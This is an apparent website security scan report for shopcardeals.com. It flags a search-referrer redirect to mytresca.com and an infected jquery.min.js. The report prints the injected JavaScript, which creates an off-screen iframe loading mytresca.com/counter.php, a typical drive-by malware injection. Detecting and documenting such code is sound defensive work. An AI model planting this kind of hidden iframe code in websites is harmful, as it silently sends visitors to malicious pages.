Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://shopcardeals.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: shopcardeals.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 18:13:29 GMT Location: http://mytresca.com/counter.php Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 239 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://shopcardeals.com/ | 200 OK Content-Length: 22179 Content-Type: text/html | clean |
http://shopcardeals.com/js/jquery-1.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4a872c88478c6b10 | 200 OK Content-Length: 6875 Content-Type: text/javascript | clean |
http://shopcardeals.com/popup/modal-window.js | 200 OK Content-Length: 1003 Content-Type: application/javascript | clean |
http://shopcardeals.com/RSS/ | 200 OK Content-Length: 22361 Content-Type: text/xml | clean |
http://shopcardeals.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://shopcardeals.com/inventory | 200 OK Content-Length: 26365 Content-Type: text/html | clean |
http://shopcardeals.com/fancybox/jquery.min.js | 200 OK Content-Length: 91342 Content-Type: application/javascript | clean |
http://shopcardeals.com/How-It-Works.html | 200 OK Content-Length: 65534 Content-Type: text/html | clean |
http://shopcardeals.com/aboutus.html | 200 OK Content-Length: 22539 Content-Type: text/html | clean |
http://shopcardeals.com/Privacy-Policy.html | 200 OK Content-Length: 24140 Content-Type: text/html | clean |
http://shopcardeals.com/Contact-Us.html | 200 OK Content-Length: 23498 Content-Type: text/html | clean |
http://shopcardeals.com/dealerlogin | 200 OK Content-Length: 23563 Content-Type: text/html | clean |
http://shopcardeals.com/js/jquery.min.js | 200 OK Content-Length: 55426 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _q = document.createElement('iframe'),_n = 'setAttribute';_q[_n]('src', 'http://mytresca.com/counter.php');_q.style.position = 'absolute';_q.style.width = '16px';_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7d03d1087e22') + 1);_q.style.left = '-6200px';document.write('<div id=\'pzadv\'></div>');document.getElementById('pzadv').appendChild(_q); Antivirus reports:
| ||
http://shopcardeals.com/autocms/js/lytebox.js | 200 OK Content-Length: 39574 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shopcardeals.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://shopcardeals.com/
Result: shopcardeals.com is not infected or malware details are not published yet.
Result: shopcardeals.com is not infected or malware details are not published yet.